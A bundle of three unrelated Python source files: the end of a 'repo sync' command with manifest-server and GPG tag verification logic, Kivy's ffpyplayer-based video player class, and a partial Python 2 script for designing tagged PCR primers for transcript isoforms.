worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty() and opt.force_remove_dirty:
print('WARNING: Removing dirty project "%s": uncommitted changes '
'erased' % project.relpath, file=sys.stderr)
self._DeleteProject(project.worktree)
elif project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return 1
elif self._DeleteProject(project.worktree):
return 1
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_name = "smart_sync_override.xml"
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, smart_sync_manifest_name)
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if not '@' in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'SYNC_TARGET' in env:
target = env['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = smart_sync_manifest_name
try:
f = open(smart_sync_manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
else: # Not smart sync or smart tag mode
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags,
optimized_fetch=opt.optimized_fetch,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
sys.exit(1)
self._Checkout(all_projects, opt)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path)
try:
self._times = json.load(f)
finally:
f.close()
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'w')
try:
json.dump(self._times, f, indent=2)
finally:
f.close()
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile()
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy })
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
..Note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__method of VideoFFPy
is not called. Because of this, the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main threads exists, it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive, hanging kivy. What
this means is that you have to be sure to delete the MediaPlayer object
before kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
s = time.perf_counter()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX if will fail later then?
if time.perf_counter() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
# we got all the information, now, get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
seek_happened = False
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
percent, precise = vals[-1]
ffplayer.seek(
percent * ffplayer.get_metadata()['duration'],
relative=False,
accurate=precise
)
seek_happened = True
self._next_frame = None
# Get next frame if paused:
if seek_happened and ffplayer.get_pause():
ffplayer.set_volume(0.0) # Try to do it silently.
ffplayer.set_pause(False)
try:
# We don't know concrete number of frames to skip,
# this number worked fine on couple of tested videos:
to_skip = 6
while True:
frame, val = ffplayer.get_frame(show=False)
# Exit loop on invalid val:
if val in ('paused', 'eof'):
break
# Exit loop on seek_queue updated:
if seek_queue:
break
# Wait for next frame:
if frame is None:
sleep(0.005)
continue
# Wait until we skipped enough frames:
to_skip -= 1
if to_skip == 0:
break
# Assuming last frame is actual, just get it:
frame, val = ffplayer.get_frame(force_refresh=True)
finally:
ffplayer.set_pause(bool(self._state == 'paused'))
ffplayer.set_volume(self._volume)
# Get next frame regular:
else:
frame, val = ffplayer.get_frame()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent, precise=True):
if self._ffplayer is None:
return
self._seek_queue.append((percent, precise,))
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt,
'sn': True,
'volume': self._volume,
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
# Disabled as an attempt to fix kivy issue #6210
# self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
designTaggedPrimersForIsoforms.py
|
#!/usr/bin/env python
import sys
from numpy import ceil, log2
from operator import itemgetter
from classMFE import MFE, MFEOptions
from IsoformSignatureClasses import Signature, IsoformSignatureGenerator
from commonCGDB import associateIsoformsToTargetGenesPlusOldID, buildTargetIsoformPartsList, annotateAndOrderTargetIsoformParts
from Bio import SeqIO
from IsoformSignatureClasses import *
def readTargetIsoformMRNAs(target_isoform_IDs, transcriptome_ref):
target_IDs, target_isoforms = set(), {}
with open(target_isoform_IDs, 'r') as ip:
for line in ip:
line = line.strip()
target_IDs.add(line)
for seq_record in SeqIO.parse(transcriptome_ref, "fasta"):
if (seq_record.id in target_IDs):
target_isoforms[seq_record.id] = str(seq_record.seq)
assert (len(target_IDs) == len(target_isoforms.keys()))
return target_isoforms
def writeSignatures(target_isoform_signature_with_primer_pair, isoformOID, output_file, output_gtf):
op = open(output_file, 'w')
op.write("IsoformID\tGeneSymbol\tStrand\tGenomicSignature\tTranscriptomicSignature\tAmpliconLength\tFP_Tm\tRP_Tm\tFP\tRP\tAmplicon\n")
for isoformID, potential_signature in target_isoform_signature_with_primer_pair.items():
fp, fp_tm, rp, rp_tm, strand = potential_signature.getPrimerPair()
transcriptID = potential_signature.getParentTranscript()
oID = isoformOID[transcriptID]
assert (isoformID == transcriptID)
signature_genomic = potential_signature.getSignatureTuple()
genomic_signature_str = "%s:%d-%d_%s" % tuple(signature_genomic[0:2] + signature_genomic[-2:])
signature_transcriptomic = potential_signature.getSignatureTupleInmRNACoords()
transcriptomic_signature_str = "%s:%d-%d,%s" % tuple(signature_transcriptomic[0:2] + signature_transcriptomic[-2:])
amplicon = potential_signature.getAmplicon()
op.write("%s\t%s\t%s\t%s\t%s\t%d\t%4.2f\t%4.2f\t%s\t%s\t%s\n" % \
(transcriptID, oID, strand, genomic_signature_str, transcriptomic_signature_str, len(amplicon), fp_tm, rp_tm, fp, rp, amplicon))
op.close()
print >> sys.stderr, "INFO: transcripts for which primer pairs were found:"
gtf = open(output_gtf, 'w')
gtf.write("track type=gtf name=Amplicons description=Amplicons visibility=full useScore=1\n")
for potential_signature in target_isoform_signature_with_primer_pair.values():
print >> sys.stderr, "\t%s" % potential_signature.parent_transcript
gtf_lines = potential_signature.getAmpliconGenomicCoords("gtf")
gtf.write("%s\n" % "\n".join(gtf_lines))
gtf.close()
def designPrimers(target_isoforms, isoforms_per_gene, isoform_parts_list, genome_ref, transcriptome_ref, fwd_tag, rev_tag, do_in_parallel=False):
primer3_param_sets = primer32ParamSets(1)
target_isoform_IDs = set(target_isoforms.keys())
target_isoform_signature_with_primer_pair = {}
transcriptomic_MFE = MFE(transcriptome_ref)
genomic_MFE = MFE(genome_ref)
mfe_options = MFEOptions()
num_isoforms_no_signature, num_isoforms_signature_but_no_primers = (0,0)
# Process each locus/gene in turn, but only need to find a signature for the isoforms in 'target_isoform_IDs'
for gene, locus_isoforms in isoforms_per_gene.items():
all_signature_generators = {}
for isoform in locus_isoforms:
isoform_mRNA_seq = None if not target_isoforms.has_key(isoform) else target_isoforms[isoform]
all_signature_generators[isoform] = IsoformSignatureGenerator(isoform, isoform_mRNA_seq, isoform_parts_list[isoform]["otp"], isoform_parts_list[isoform]["strand"])
this_locus_target_isoform_IDs = locus_isoforms.intersection(target_isoform_IDs)
# For each isoform in turn, find a signature, see check for best primers, then check for genomic specificity. Add to
# class IsoformSignatureGenerator some clean way to say "exhausted signature options" so that I will know that what
# I've got to that point is the best I'll get to work with.
for target_isoform_ID in this_locus_target_isoform_IDs:
#if (target_isoform_ID not in ["ERCC-00134"]):
# continue
num_valid_signatures_for_isoform = 0
print >> sys.stderr, "\nINFO: finding signature with primers for %s" % target_isoform_ID
the_other_isoforms = locus_isoforms - set([target_isoform_ID])
if (do_in_parallel):
q = Queue()
all_unique_signatures, jobs = [], []
for signature in all_signature_generators[target_isoform_ID].getAllSignatures():
if (not any([all_signature_generators[x].signatureIndicatesMe(signature) for x in the_other_isoforms])):
num_valid_signatures_for_isoform += 1
all_unique_signatures.append(signature)
job = Process(target=signature.findPrimerPair, args=(primer3_param_sets, transcriptomic_MFE, genomic_MFE, mfe_options, set([target_isoform_ID]), False, q))
job.start()
print >> sys.stderr, "Started job"
jobs.append(job)
if (len(all_unique_signatures)>0):
for job in jobs:
job.join()
primer_results = dict([q.get() for job in jobs])
signature_results = []
for signature in all_unique_signatures:
signature_tuple = signature.getSignatureTuple()
if (primer_results[signature_tuple] != None):
signature.setPrimerPair( * primer_results[signature_tuple] )
signature_results.append( (signature.getPrimerPairStratum(), signature.getAmpliconLength(), signature) )
if (len(signature_results) > 0):
signature_results = sorted(signature_results, key=itemgetter(0,1))
target_isoform_ID_signature_with_primer_pair[target_isoform_ID] = signature_results[0][-1]
else:
potential_signature = all_signature_generators[target_isoform_ID].nextPotentialSignature()
best_primer_pair_stratum = 1e10
while (potential_signature != None): # and best_primer_pair_stratum > 0): # (not potential_signature.hasPrimerPair() or
if (not any([all_signature_generators[x].signatureIndicatesMe(potential_signature) for x in the_other_isoforms])):
num_valid_signatures_for_isoform += 1
print >> sys.stderr, "\tEvaluating signature", potential_signature.signature_tuple
msg = potential_signature.findPrimerPair(primer3_param_sets, transcriptomic_MFE, genomic_MFE, mfe_options, target_isoform_ID,
fwd_tag, rev_tag, True, True)
if (potential_signature.hasPrimerPair()):
if (target_isoform_signature_with_primer_pair.has_key(target_isoform_ID)):
if (target_isoform_signature_with_primer_pair[target_isoform_ID].getPrimerPairStratum() > potential_signature.getPrimerPairStratum()):
print >> sys.stderr, msg, "Is new best because primers from lower parameter stratum."
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
elif (target_isoform_signature_with_primer_pair[target_isoform_ID].getAmpliconLength() > potential_signature.getAmpliconLength() and
target_isoform_signature_with_primer_pair[target_isoform_ID].getPenalty() > potential_signature.getPenalty()):
print >> sys.stderr, msg, "Is new best because amplicon is shorter and has smaller Primer3 penalty."
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
else:
print >> sys.stderr, msg
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
potential_signature = all_signature_generators[target_isoform_ID].nextPotentialSignature()
if (not target_isoform_signature_with_primer_pair.has_key(target_isoform_ID)):
if (num_valid_signatures_for_isoform > 0):
num_isoforms_signature_but_no_primers += 1
print >> sys.stderr, "WARNING: could not find suitable primer pair for any of the %d signature(s) of %s" % \
(num_valid_signatures_for_isoform, target_isoform_ID)
else:
num_isoforms_no_signature += 1
print >> sys.stderr, "WARNING: could not find distinguishing signature for %s" % target_isoform_ID
transcriptomic_MFE.finalize()
genomic_MFE.finalize()
print >> sys.stderr, "\nINFO: of %d isoforms, %d had no signatures and %d had no signature primers" % \
(len(target_isoforms), num_isoforms_no_signature, num_isoforms_signature_but_no_primers)
return target_isoform_signature_with_primer_pair
def evalPrimerPool(target_isoform_signature_with_primer_pair):
all_primers = []
for isoformID, potential_signature in target_isoform_signature_with_primer_pair.items():
fp, fp_tm, rp, rp_tm, strand = potential_signature.getPrimerPair()
all_primers.extend( [(isoformID, "fwd", fp), (isoformID, "rev", rp)] )
OligosEvaluator = DNAStructureEvaluator(56.0)
# Evaluate all pairs of primers (excluding ones from same isoformID)
all_primer_pairs = []
for i in xrange(len(all_primers)-1):
for j in xrange(i+1, len(all_primers)):
if (all_primers[i][0] != all_primers[j][0]):
pair_label = "%s,%s+%s,%s" % (all_primers[i][0], all_primers[i][1], all_primers[j][0], all_primers[j][1])
all_primer_pairs.append( (pair_label, (all_primers[i][2], all_primers[j][2])) )
all_primer_pair_dG = OligosEvaluator.checkForDimer(all_primer_pairs, True)
def primer32ParamSets(num_ranges=5):
common = [("PRIMER_TASK","generic"), ("PRIMER_EXPLAIN_FLAG",1), ("PRIMER_FIRST_BASE_INDEX",1), ("PRIMER_OPT_SIZE",18),
("PRIMER_MIN_SIZE",18), ("PRIMER_MAX_SIZE",24), ("PRIMER_PRODUCT_OPT_SIZE",150), ("PRIMER_PRODUCT_SIZE_RANGE","90-210"),
("PRIMER_PAIR_MAX_DIFF_TM",6), ("PRIMER_THERMODYNAMIC_ALIGNMENT",1)] # , ("SEQUENCE_INCLUDED_REGION","1,149")
param_sets = [ dict( common + [("PRIMER_MIN_TM",58), ("PRIMER_MAX_TM",63), ("PRIMER_OPT_TM",60), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
